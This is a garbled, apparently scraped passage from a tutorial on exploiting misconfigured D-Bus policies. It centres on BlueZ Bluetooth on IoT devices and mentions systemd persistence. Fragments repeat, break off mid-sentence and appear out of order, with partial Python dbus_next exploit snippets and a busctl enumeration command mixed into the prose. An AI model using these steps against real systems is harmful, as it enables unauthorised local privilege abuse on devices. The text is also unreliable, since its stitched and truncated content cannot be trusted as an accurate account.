The vendor copied policy files from an old BlueZ version that trusted user="root" only, but they ran the Bluetooth daemon as root and forgot to add <deny user="*"/> for sensitive methods. The RegisterAgent method does not check if the caller has the CAP_NET_ADMIN capability. Part 5: Persistence and Lateral Movement Once you have D-Bus method execution on a privileged service, persistence becomes elegant. The Systemd Trap Systemd exposes org.freedesktop.systemd1.Manager on the system bus. A successful exploit chain can call:
# Craft a method call to a method that normally requires admin # but is mis-policy'd: "SetProperty" on the adapter to force discoverable msg = Message( destination='org.bluez', path='/org/bluez/hci0', interface='org.freedesktop.DBus.Properties', member='Set', signature='ssv', body=['org.bluez.Adapter1', 'Discoverable', Variant('b', True)] ) dbus-1.0 exploit
Consider a fictional backup service that exposes a method: Backup.TransferFile(String source_path, String dest_host) The vendor copied policy files from an old
org.bluez – the BlueZ Bluetooth stack. Vulnerability: Many IoT vendors expose the AgentManager1 interface without the NoOutput capability check, allowing a local non-root user to pair with a device and then send arbitrary HCI commands. The Systemd Trap Systemd exposes org
import asyncio from dbus_next.aio import MessageBus from dbus_next import Message, MessageType, Variant async def bluetooth_exploit(): # Connect to the system bus bus = await MessageBus(bus_type='system').connect()
busctl list This returns a list of unique IDs (like :1.123 ) and well-known names (like org.freedesktop.NetworkManager ).